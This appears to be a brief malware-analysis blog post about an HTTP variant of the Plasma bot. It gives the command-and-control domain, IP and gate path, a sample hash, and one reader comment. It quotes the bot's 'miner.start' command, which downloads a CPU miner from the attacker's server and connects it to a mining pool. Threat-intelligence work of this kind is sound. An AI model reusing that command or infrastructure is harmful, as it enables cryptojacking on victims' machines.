Resolved illuminati.sx to 109.236.80.74
Server: illuminati.sx
Gate file: /http/gate.php
This is the first time I have seen the HTTP version of Plasma and it sucks hard. It seems to be a slightly upgraded version of the old Barracuda HTTP bot, with few of the problems fixed.
Hosting info: http://whois.domaintools.com/109.236.80.74
Bitcoin mining info:
miner.start http://109.236.80.74/miner/CPUMiner.files *-a scrypt -o stratum+tcp://pool.d2.cc:3335 -O avaster.x:x -t THREADS*
Bonus: hxxp://109.236.80.74/miner/Miner.txt
Related md5s (Download sample from Malwr.com)
Plasmabot: a58ca1310ecdbc1a4f2faaad2751b489
Anonymous - February 16, 2014 at 5:45 pm
Goddamnit, just don't track this bot back to the Hack Forums… Jesus Christ, these people deserve to go to jail… the IQ of a person who hosts miner info or any other info in plain text is equal to the IQ of a slightly smarter fish!